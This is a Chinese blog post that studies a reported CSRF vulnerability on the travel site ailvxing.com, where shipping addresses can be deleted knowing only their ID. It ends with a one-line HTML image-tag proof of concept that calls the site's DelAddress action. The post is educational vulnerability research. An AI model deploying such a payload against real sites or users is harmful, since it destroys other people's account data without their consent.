【漏洞学习——CSRF】爱旅行网csrf删除收货地址

FLy_鹏程万里

于 2019-02-22 17:51:52 发布

阅读量294

点赞数

CC 4.0 BY-SA版权

分类专栏：【渗透测试实战】 # 乌云漏洞案例学习

本文链接：https://blog.youkuaiyun.com/Fly_hps/article/details/84390409

160 篇文章

订阅专栏

75 篇文章

订阅专栏

本文详细介绍了在某网站中发现的CSRF漏洞，该漏洞允许攻击者仅通过目标用户的地址ID构造URL，即可删除用户的收货地址。文章展示了如何利用此漏洞进行攻击，并提供了POC示例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

在测试网站时发现删除收获地址时,只采用ID进行认证，也就是说只要知道对方的地址ID，便可构造poc进行CSRF，于是注册了两个号来测试：
帐号1：

帐号2：

构造url:

让账号1来访问：

可以看到已经成功删除。
可构造POC:

<html>
<img src="http://www.ailvxing.com//e/ShopSys/doaction.php？enews=DelAddress&addressid=1592">
</html>